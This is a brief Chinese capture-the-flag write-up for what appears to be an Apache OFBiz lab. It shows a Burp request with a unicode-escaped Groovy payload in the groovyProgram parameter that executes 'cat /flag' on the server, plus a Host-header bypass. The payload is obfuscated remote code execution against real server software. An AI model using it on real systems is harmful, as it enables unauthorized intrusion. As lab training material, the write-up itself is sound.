1.拿到环境之后,访问/accounting/control/main
需要抓包把Headers 的 Host改成 localhost,否则报错:

2.开启burp,打开内嵌的浏览器,修改请求payload(这里的端口号要按你自己下发的来)为:
groovyProgram=\u0074\u0068\u0072\u006f\u0077\u0020\u006e\u0065\u0077\u0020\u0045\u0078\u0063\u0065\u0070\u0074\u0069\u006f\u006e\u0028\u0027\u0063\u0061\u0074\u0020\u002f\u0066\u006c\u0061\u0067\u0027\u002e\u0065\u0078\u0065\u0063\u0075\u0074\u0065\u0028\u0029\u002e\u0074\u0065\u0078\u0074\u0029\u003b
`

3.在下面响应包里面搜索flag,即可ctf